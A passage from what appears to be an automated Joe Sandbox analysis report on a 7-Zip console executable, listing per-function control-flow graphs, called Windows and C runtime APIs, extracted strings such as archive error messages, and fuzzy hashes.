                                  • Part of subcall function 00441784: free.MSVCRT ref: 004417B7
                                  • Part of subcall function 00441784: free.MSVCRT ref: 004417BF
                                  • Part of subcall function 00441784: free.MSVCRT ref: 004417CC
                                  • Part of subcall function 00441784: free.MSVCRT ref: 004417F8
                                  • Part of subcall function 00441784: free.MSVCRT ref: 00441801
                                  • Part of subcall function 00441784: free.MSVCRT ref: 00441809
                                  • Part of subcall function 00441784: free.MSVCRT ref: 00441816
                                • free.MSVCRT ref: 00449D18
                                  • Part of subcall function 00413730: free.MSVCRT ref: 0041376A
                                  • Part of subcall function 00413730: memmove.MSVCRT(00000000,?,?,00000000,004110B0), ref: 00413785
                                • free.MSVCRT ref: 00449D50
                                • GetProcAddress.KERNEL32 ref: 00449DA6
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove$AddressProc
                                • String ID: 7z.dll$Codecs$Formats$SetCodecs
                                • API String ID: 4053071709-3422688593
                                • Opcode ID: b428be2be7e56feabc1b879de8a2f9b52c1dd976b4b26d83b5dfddc809408503
                                • Instruction ID: 37faa1f67efab7f2ae99932dab60bb640fb14db8c43a0ec9d78bad94febb0c92
                                • Opcode Fuzzy Hash: b428be2be7e56feabc1b879de8a2f9b52c1dd976b4b26d83b5dfddc809408503
                                • Instruction Fuzzy Hash: 2DC19076604A8596EB20EF26E5803AFB760F384788F544117DB8E47B25DF7CC8A9D708
                                Function 0043C0C8 Relevance: 28.8, APIs: 17, Strings: 2, Instructions: 309COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 3109 43c0c8-43c157 call 439be0 call 43bf1c memmove 3114 43c172-43c185 3109->3114 3115 43c159-43c16d call 43c044 free 3109->3115 3117 43c221-43c22e call 43c044 3114->3117 3118 43c18b 3114->3118 3122 43c53d-43c550 3115->3122 3126 43c230-43c255 call 4386a8 _CxxThrowException 3117->3126 3127 43c256-43c268 3117->3127 3121 43c18e-43c1a2 3118->3121 3124 43c213-43c21b 3121->3124 3125 43c1a4-43c1d6 call 438c88 call 455a44 call 412350 3121->3125 3124->3117 3124->3121 3148 43c1e8 3125->3148 3149 43c1d8-43c1e6 call 4136a8 3125->3149 3126->3127 3129 43c2e7-43c314 call 4551a8 3127->3129 3130 43c26a-43c26d 3127->3130 3141 43c342-43c368 call 41dae0 3129->3141 3142 43c316 3129->3142 3135 43c26f-43c2a7 call 41354c call 417544 call 455a44 call 412350 3130->3135 3173 43c2bb 3135->3173 3174 43c2a9-43c2b9 call 4136a8 3135->3174 3157 43c396-43c3ad call 41dae0 3141->3157 3158 43c36a 3141->3158 3145 43c31a-43c32b 3142->3145 3150 43c33d-43c340 3145->3150 3151 43c32d-43c338 free * 2 3145->3151 3156 43c1eb-43c20c free 3148->3156 3149->3156 3150->3141 3150->3145 3151->3150 3156->3124 3167 43c3b3-43c3b6 3157->3167 3168 43c4b6-43c4cc free 3157->3168 3161 43c36e-43c37f 3158->3161 3165 43c391-43c394 3161->3165 3166 43c381-43c38c free * 2 3161->3166 3165->3157 3165->3161 3166->3165 3170 43c3b9-43c3dc call 412350 3167->3170 3171 43c4ce 3168->3171 3172 43c4fc-43c50a free 3168->3172 3187 43c3ee 3170->3187 3188 43c3de-43c3ec call 4136a8 3170->3188 3176 43c4d2-43c4e5 3171->3176 3178 43c50f-43c51c 3172->3178 3179 43c2be-43c2e5 free 3173->3179 3174->3179 3183 43c4f7-43c4fa 3176->3183 3184 43c4e7-43c4f2 free * 2 3176->3184 3180 43c52e-43c531 3178->3180 3181 43c51e-43c529 free * 2 3178->3181 3179->3129 3179->3135 3180->3178 3186 43c533-43c53b free 3180->3186 3181->3180 3183->3172 3183->3176 3184->3183 3186->3122 3190 43c3f1-43c42a call 412350 3187->3190 3188->3190 3194 43c43c 3190->3194 3195 43c42c-43c43a call 4136a8 3190->3195 3196 43c43f-43c452 3194->3196 3195->3196 3198 43c470-43c47e 3196->3198 3199 43c454-43c46e call 414ee4 3196->3199 3198->3170 3202 43c484 3198->3202 3199->3198 3204 43c486-43c4b5 call 4386a8 _CxxThrowException 3199->3204 3202->3168 3204->3168
                                APIs
                                  • Part of subcall function 0043BF1C: free.MSVCRT ref: 0043BFDB
                                • memmove.MSVCRT ref: 0043C14F
                                • free.MSVCRT ref: 0043C166
                                • free.MSVCRT ref: 0043C207
                                • _CxxThrowException.MSVCRT ref: 0043C250
                                • free.MSVCRT ref: 0043C2D9
                                  • Part of subcall function 0043C044: free.MSVCRT ref: 0043C057
                                  • Part of subcall function 0043C044: free.MSVCRT ref: 0043C072
                                  • Part of subcall function 0043C044: free.MSVCRT ref: 0043C07B
                                  • Part of subcall function 0043C044: free.MSVCRT ref: 0043C0A6
                                  • Part of subcall function 0043C044: free.MSVCRT ref: 0043C0AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ExceptionThrowmemmove
                                • String ID: Cannot find archive$Duplicate archive path:
                                • API String ID: 3934437811-2067063536
                                • Opcode ID: 1b9646bc435d3208f139c2aac129064c73059193869c0b617ab2b1beba7b5aff
                                • Instruction ID: 00197024828f8eee69ea0c5ed2d62de36f9646e59d304e5f90616deed721387f
                                • Opcode Fuzzy Hash: 1b9646bc435d3208f139c2aac129064c73059193869c0b617ab2b1beba7b5aff
                                • Instruction Fuzzy Hash: C4B1B572715A8482CB20EB26E49019EB361F789BD4F445617EE9E57B18DF3CC852CB08
                                Function 004470AC Relevance: 27.2, APIs: 13, Strings: 5, Instructions: 152COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 3207 4470ac-447101 call 416c8c call 413504 call 4192d4 3214 447166 3207->3214 3215 447103-447130 call 413504 call 4192d4 3207->3215 3216 447169-44716d 3214->3216 3215->3214 3229 447132-44715f call 413504 call 4192d4 3215->3229 3219 44717d-447181 3216->3219 3220 44716f-44717c free 3216->3220 3222 447191-447195 3219->3222 3223 447183-447190 free 3219->3223 3220->3219 3225 447197-44719c free 3222->3225 3226 4471a1-4471a4 3222->3226 3223->3222 3225->3226 3227 4472d3-4472eb call 4136a8 free 3226->3227 3228 4471aa-4471d2 call 41354c call 446f74 3226->3228 3238 4472ee-4472f5 3227->3238 3241 4471d4-4471fa call 4136a8 free * 2 3228->3241 3242 4471ff-44721c call 446f74 3228->3242 3229->3214 3243 447161-447164 3229->3243 3241->3238 3248 44721e-447244 call 4136a8 free * 2 3242->3248 3249 447249-44725f call 446f74 3242->3249 3243->3216 3248->3238 3254 447261-447287 call 4136a8 free * 2 3249->3254 3255 447289-44729f call 446f74 3249->3255 3254->3238 3260 4472a1-4472c7 call 4136a8 free * 2 3255->3260 3261 4472c9-4472ce free 3255->3261 3260->3238 3261->3227
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove
                                • String ID: 7z.dll$Codecs$Formats$Path$Path64
                                • API String ID: 1534225298-3804457719
                                • Opcode ID: 0ee43319ccbabe998e43829a73327be4aef6bcdc6f0d81ad496a92ee476f1eae
                                • Instruction ID: 73f7aad5d9e7af525343a5eae5b693efbebf73e0a6d9294321ebebffba137396
                                • Opcode Fuzzy Hash: 0ee43319ccbabe998e43829a73327be4aef6bcdc6f0d81ad496a92ee476f1eae
                                • Instruction Fuzzy Hash: D951846224860951DA20EF26E4513AE6721D7C1BE8F841217BE9E577B9CF6CC98BC708
                                Function 00460FE8 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 122COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 3264 460fe8-46101e EnterCriticalSection 3265 461020-461026 call 46b4d0 3264->3265 3266 461049-461053 3264->3266 3270 46102b-461044 3265->3270 3268 461055 call 4124a8 3266->3268 3269 46105a-46105c 3266->3269 3268->3269 3272 461062-46106a 3269->3272 3273 461129-461136 3269->3273 3270->3266 3276 4610b2-4610c3 3272->3276 3277 46106c-461072 3272->3277 3274 46113c-461142 3273->3274 3275 4611e9-4611f2 LeaveCriticalSection 3273->3275 3274->3275 3278 461148-461152 3274->3278 3279 4611f4-4611fd 3275->3279 3280 4610c5-4610d2 call 4124c4 3276->3280 3281 461102-46110c 3276->3281 3277->3276 3282 461074-46107a 3277->3282 3285 461154-461172 call 4124c4 fputs 3278->3285 3286 4611cc-4611e7 LeaveCriticalSection 3278->3286 3280->3281 3296 4610d4-4610fd fputs call 41263c call 4124c4 3280->3296 3281->3286 3288 461112-461119 3281->3288 3283 461085 3282->3283 3284 46107c-461083 3282->3284 3290 46108c-461096 3283->3290 3284->3290 3299 461174-46118b fputs 3285->3299 3300 46118d-4611af call 425f6c call 412790 free 3285->3300 3286->3279 3288->3286 3289 46111f-461124 call 4124a8 3288->3289 3289->3286 3290->3281 3294 461098-4610ab fputs call 4124c4 3290->3294 3302 4610b0 3294->3302 3296->3281 3303 4611b4-4611c7 call 4124c4 call 4124a8 3299->3303 3300->3303 3302->3281 3303->3286
                                APIs
                                • EnterCriticalSection.KERNEL32 ref: 0046100F
                                • fputs.MSVCRT ref: 004610A2
                                • LeaveCriticalSection.KERNEL32 ref: 004611DF
                                  • Part of subcall function 0046B4D0: memset.MSVCRT ref: 0046B515
                                  • Part of subcall function 0046B4D0: fputs.MSVCRT ref: 0046B53A
                                • fputs.MSVCRT ref: 004610E5
                                  • Part of subcall function 0041263C: fputs.MSVCRT ref: 0041265D
                                • fputs.MSVCRT ref: 00461166
                                • fputs.MSVCRT ref: 00461185
                                • LeaveCriticalSection.KERNEL32 ref: 004611EC
                                  • Part of subcall function 004124C4: fputc.MSVCRT ref: 004124D5
                                • free.MSVCRT ref: 004611AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs$CriticalSection$Leave$Enterfputcfreememset
                                • String ID: Can't allocate required memory!$ERROR: $Everything is Ok$Sub items Errors: $p
                                • API String ID: 676172275-580504279
                                • Opcode ID: d67db602faefb942015f063706c8f37e49b44373b54a083d9a794ddac30406b5
                                • Instruction ID: a704836268c8c7c681b75e0ddbc988372986ae625731cd79a6a7160b5d8bd6fd
                                • Opcode Fuzzy Hash: d67db602faefb942015f063706c8f37e49b44373b54a083d9a794ddac30406b5
                                • Instruction Fuzzy Hash: 3C5150B2305A81A2DF19DB26DA903E96320F74AB94F084227DB1E47761DF7CD4B5C30A
                                Function 0041E07C Relevance: 21.6, APIs: 17, Instructions: 349COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 3313 41e07c-41e0af 3314 41e0b1 3313->3314 3315 41e0df-41e0ed 3313->3315 3318 41e0b5-41e0c7 3314->3318 3316 41e11d-41e12a 3315->3316 3317 41e0ef 3315->3317 3320 41e130-41e16a call 412db8 call 41354c 3316->3320 3321 41e41e-41e425 3316->3321 3319 41e0f3-41e105 3317->3319 3322 41e0c9-41e0d5 free * 2 3318->3322 3323 41e0da-41e0dd 3318->3323 3324 41e107-41e113 free * 2 3319->3324 3325 41e118-41e11b 3319->3325 3339 41e17c-41e187 3320->3339 3340 41e16c-41e177 free 3320->3340 3326 41e595 3321->3326 3327 41e42b-41e444 call 412db8 3321->3327 3322->3323 3323->3315 3323->3318 3324->3325 3325->3316 3325->3319 3329 41e597-41e5aa 3326->3329 3336 41e58b-41e590 free 3327->3336 3337 41e44a-41e474 3327->3337 3336->3326 3345 41e565-41e570 call 41be6c 3337->3345 3346 41e47a-41e480 3337->3346 3343 41e409-41e419 free * 2 3339->3343 3344 41e18d-41e1b6 3339->3344 3342 41e3f8-41e404 free 3340->3342 3342->3329 3343->3321 3351 41e1bc-41e1c2 3344->3351 3352 41e33e-41e356 call 41be6c free 3344->3352 3361 41e57d-41e589 free 3345->3361 3349 41e491-41e4cb call 41bf00 3346->3349 3350 41e482-41e48c call 41be6c 3346->3350 3371 41e4d1-41e4da 3349->3371 3372 41e572-41e57c call 41be6c 3349->3372 3362 41e558-41e55d 3350->3362 3357 41e1d3-41e20c call 41bf00 3351->3357 3358 41e1c4-41e1ce call 41be6c 3351->3358 3352->3342 3380 41e212-41e21b 3357->3380 3381 41e35b-41e373 call 41be6c free 3357->3381 3370 41e329-41e333 3358->3370 3361->3329 3362->3337 3369 41e563 3362->3369 3369->3336 3370->3344 3376 41e339 3370->3376 3373 41e4ed-41e4f1 3371->3373 3374 41e4dc-41e4eb call 412f28 3371->3374 3372->3361 3382 41e4f3-41e4fd call 41be6c 3373->3382 3383 41e4ff-41e520 call 455a44 call 412350 3373->3383 3374->3383 3376->3343 3386 41e21d-41e22c call 412f28 3380->3386 3387 41e22e-41e232 3380->3387 3381->3342 3382->3362 3403 41e522-41e538 call 412e34 3383->3403 3404 41e53a 3383->3404 3394 41e243-41e25d call 41d894 3386->3394 3387->3394 3395 41e234-41e23e call 41be6c 3387->3395 3405 41e263-41e288 call 41d894 3394->3405 3406 41e378-41e390 call 41be6c free 3394->3406 3395->3370 3410 41e53d-41e553 call 41be6c 3403->3410 3404->3410 3415 41e392-41e3aa call 41be6c free 3405->3415 3416 41e28e-41e296 3405->3416 3406->3342 3410->3362 3415->3342 3418 41e2a7-41e2c1 call 41d93c 3416->3418 3419 41e298-41e2a2 call 41be6c 3416->3419 3425 41e2c7-41e2e1 call 41d93c 3418->3425 3426 41e3ac-41e3c4 call 41be6c free 3418->3426 3419->3370 3431 41e2e7-41e301 call 41d93c 3425->3431 3432 41e3c6-41e3de call 41be6c free 3425->3432 3426->3342 3437 41e3e0-41e3f6 call 41be6c free 3431->3437 3438 41e307-41e319 call 455a44 call 41da48 3431->3438 3432->3342 3437->3342 3444 41e31e-41e324 call 41be6c 3438->3444 3444->3370
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ClearVariant
                                • String ID:
                                • API String ID: 1677346816-0
                                • Opcode ID: b2011a61e1b9e46066989be7237a598fc2fe20666997cd285cbefd50ad59e57e
                                • Instruction ID: b355e39b3f884915bfde1ca07b60af7eb4fbd987566637bb8d115ec8e7860991
                                • Opcode Fuzzy Hash: b2011a61e1b9e46066989be7237a598fc2fe20666997cd285cbefd50ad59e57e
                                • Instruction Fuzzy Hash: 89C18F36704A5492CA20EF26E4801EEA760F789B44F940127EF5E97B25DF3DC9D6CB48
                                Function 00453616 Relevance: 21.3, APIs: 13, Strings: 1, Instructions: 324COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 3446 453616-453634 3448 453636-453644 3446->3448 3449 453649-45364c 3446->3449 3448->3449 3450 453654-45371f call 43c944 memmove call 413798 call 452710 3449->3450 3451 45364e 3449->3451 3459 453725-453727 3450->3459 3460 453953-453a0a call 413798 * 3 free * 2 call 43ca94 3450->3460 3451->3450 3461 453a40-453a6f free * 2 call 43ca94 3459->3461 3462 45372d-453743 call 44b3b4 3459->3462 3497 453a13-453a1b 3460->3497 3498 453a0c-453a12 3460->3498 3471 453a71-453a77 3461->3471 3472 453a78-453a80 3461->3472 3473 453aa3-453ad2 free * 2 call 43ca94 3462->3473 3474 453749-453763 call 455a44 call 412350 3462->3474 3471->3472 3478 453a82-453a88 3472->3478 3479 453a89-453a94 3472->3479 3487 453ad4-453ada 3473->3487 3488 453adb-453ae3 3473->3488 3501 453765-453778 call 44b8e4 3474->3501 3502 45377a 3474->3502 3478->3479 3484 453a96 3479->3484 3485 453a9c-453a9e 3479->3485 3484->3485 3486 453b79-453b8c 3485->3486 3487->3488 3493 453ae5-453aeb 3488->3493 3494 453aec-453af7 3488->3494 3493->3494 3499 453aff-453b01 3494->3499 3500 453af9 3494->3500 3505 453a24-453a2f 3497->3505 3506 453a1d-453a23 3497->3506 3498->3497 3499->3486 3508 453b6d-453b76 3499->3508 3500->3499 3503 45377d-4537bc free * 2 call 43ca94 3501->3503 3502->3503 3516 4537c5-4537cd 3503->3516 3517 4537be-4537c4 3503->3517 3505->3508 3512 453a35-453a3b 3505->3512 3506->3505 3508->3486 3512->3508 3518 4537d6-4537e7 3516->3518 3519 4537cf-4537d5 3516->3519 3517->3516 3521 4537ed-4537f3 3518->3521 3522 453309-453398 memmove 3518->3522 3519->3518 3521->3522 3525 4533b9-4533d7 memmove 3522->3525 3526 45339a-4533b7 memmove 3522->3526 3525->3508 3528 4533dd-45344e memmove call 44aec4 call 413798 * 2 call 452a28 3525->3528 3526->3528 3538 453453-453457 3528->3538 3539 45345d-453477 call 455a44 call 412350 3538->3539 3540 4537f8-4537fb 3538->3540 3553 45348e 3539->3553 3554 453479-45348c call 44b8e4 3539->3554 3541 453887-453896 call 43ca94 3540->3541 3542 453801-453886 call 413798 * 3 3540->3542 3541->3486 3542->3541 3557 453491-4534ae call 43ca94 3553->3557 3554->3557
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove
                                • String ID:
                                • API String ID: 1534225298-3916222277
                                • Opcode ID: 8b4caeb950cbe161e56d81e3966d8e5f9c712ebcee9e431d21324a34651fa949
                                • Instruction ID: bf9948aa654561e064c9a21051a3bb2d4dcd656f0e5d6e22b548d65e36601986
                                • Opcode Fuzzy Hash: 8b4caeb950cbe161e56d81e3966d8e5f9c712ebcee9e431d21324a34651fa949
                                • Instruction Fuzzy Hash: 7DD14D73209BC496CB21DF26E09029EBB60F385B89F444116DB8E47B66DF7CC999CB05
                                Function 004493B8 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 186libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcAddress.KERNEL32 ref: 00449543
                                • GetProcAddress.KERNEL32 ref: 00449564
                                • GetProcAddress.KERNEL32 ref: 00449587
                                • free.MSVCRT ref: 00449644
                                • GetLastError.KERNEL32 ref: 00449411
                                  • Part of subcall function 00416B80: FreeLibrary.KERNELBASE(?,?,?,00416C03), ref: 00416B91
                                  • Part of subcall function 00455A44: _CxxThrowException.MSVCRT ref: 00455A74
                                  • Part of subcall function 00455A44: memmove.MSVCRT ref: 00455AAD
                                  • Part of subcall function 00455A44: free.MSVCRT ref: 00455AB5
                                  • Part of subcall function 00412350: malloc.MSVCRT ref: 00412360
                                  • Part of subcall function 00412350: _CxxThrowException.MSVCRT ref: 0041237B
                                • free.MSVCRT ref: 00449655
                                Strings
                                • CreateObject, xrefs: 0044957C
                                • the module is not compatible with program, xrefs: 00449511
                                • cannot load file as datafile library, xrefs: 0044943B
                                • SetCaseSensitive, xrefs: 00449559
                                • SetLargePageMode, xrefs: 00449538
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: AddressProcfree$ExceptionThrow$ErrorFreeLastLibrarymallocmemmove
                                • String ID: CreateObject$SetCaseSensitive$SetLargePageMode$cannot load file as datafile library$the module is not compatible with program
                                • API String ID: 3132779546-1792956296
                                • Opcode ID: feee42203aa24b2703ff37248d8e6ac729fd08cae7b6304639fd7328bd49b841
                                • Instruction ID: a402d0bb35d2d128c3b756a7b42d5c670692195a8dd2cbfa0be959ad7ad6ea2b
                                • Opcode Fuzzy Hash: feee42203aa24b2703ff37248d8e6ac729fd08cae7b6304639fd7328bd49b841
                                • Instruction Fuzzy Hash: 6061E072301B40A6EF14EF26D5543AE23A0FB85B98F44452A9F5E87791EF3CD8A5D308
                                Function 004488B0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 149libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,FFFFFFFF,00000000), ref: 004488E1
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,FFFFFFFF,00000000), ref: 004488F6
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,FFFFFFFF,00000000), ref: 0044890B
                                • GetProcAddress.KERNEL32 ref: 00448936
                                • memmove.MSVCRT ref: 00448A59
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,FFFFFFFF,00000000), ref: 00448A8C
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: AddressProc$memmove
                                • String ID: CreateDecoder$CreateEncoder$GetHashers$GetMethodProperty$GetNumberOfMethods
                                • API String ID: 2879976980-73314117
                                • Opcode ID: ea001d529e21fa486ba1d8765e8fb72d218ee3b8b902cfa8c72413175b78bef0
                                • Instruction ID: acda87329fe04fcecd5dd4acd5e6a2ea2bd90247aedeb650fb44bfd6cb0ca977
                                • Opcode Fuzzy Hash: ea001d529e21fa486ba1d8765e8fb72d218ee3b8b902cfa8c72413175b78bef0
                                • Instruction Fuzzy Hash: A5516E72618A80CAD721DF14E8847AEB761F384794F51021BEA8E47B68DFBCC985C748
                                Function 004696A5 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 96COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ExceptionThrowfputcfputs
                                • String ID: Decoding ERROR
                                • API String ID: 169956451-2585761706
                                • Opcode ID: a59dee74f476df6a6aad30d7778586064c72fb2b935b142bad887d2b23d84382
                                • Instruction ID: 88840ca7e5b7c7e55b2c6b20af2c1d2bdb38f3b48ba068b74612796d88fb55af
                                • Opcode Fuzzy Hash: a59dee74f476df6a6aad30d7778586064c72fb2b935b142bad887d2b23d84382
                                • Instruction Fuzzy Hash: A131E762755AC982DB30EB22F9903AE6310F780B98F444127CE5D57768EF7CC956CB0A
                                Function 00461358 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 250COMMON
                                Download Yara Rule
                                APIs
                                • fputs.MSVCRT ref: 0046149D
                                  • Part of subcall function 0046B4D0: memset.MSVCRT ref: 0046B515
                                  • Part of subcall function 0046B4D0: fputs.MSVCRT ref: 0046B53A
                                  • Part of subcall function 004124C4: fputc.MSVCRT ref: 004124D5
                                • fputs.MSVCRT ref: 004615A4
                                • fputs.MSVCRT ref: 004616C0
                                • fputs.MSVCRT ref: 00461715
                                  • Part of subcall function 00460EB4: fputs.MSVCRT ref: 00460EDC
                                  • Part of subcall function 00460EB4: fputs.MSVCRT ref: 00460EF0
                                  • Part of subcall function 00460EB4: free.MSVCRT ref: 00460F03
                                  • Part of subcall function 00412790: fputs.MSVCRT ref: 004127D9
                                  • Part of subcall function 00412790: free.MSVCRT ref: 004127E5
                                  • Part of subcall function 00412790: free.MSVCRT ref: 004127F0
                                • free.MSVCRT ref: 0046173F
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs$free$fputcmemset
                                • String ID: Can't allocate required memory$ERROR: $ERRORS:$WARNINGS:
                                • API String ID: 738794847-24972044
                                • Opcode ID: a3ad9c4225bfd94baf50ffd7a6141bf49be2fef2ca62c158f2191260a135c682
                                • Instruction ID: 6dd9e00e4d03b6aa393d9a6abb5311f2bf989c7ce13ad79f35b0012463e95f84
                                • Opcode Fuzzy Hash: a3ad9c4225bfd94baf50ffd7a6141bf49be2fef2ca62c158f2191260a135c682
                                • Instruction Fuzzy Hash: 1DA15D76700AC5A6CA29EF26D6903EE7321F384784F48411BDB5E47761EF6CD8B4831A
                                Function 00467CC0 Relevance: 15.1, APIs: 9, Strings: 1, Instructions: 63COMMON
                                Download Yara Rule
                                APIs
                                • free.MSVCRT ref: 00467CE5
                                • free.MSVCRT ref: 00467CEE
                                • free.MSVCRT ref: 00467D21
                                • free.MSVCRT ref: 00467D2E
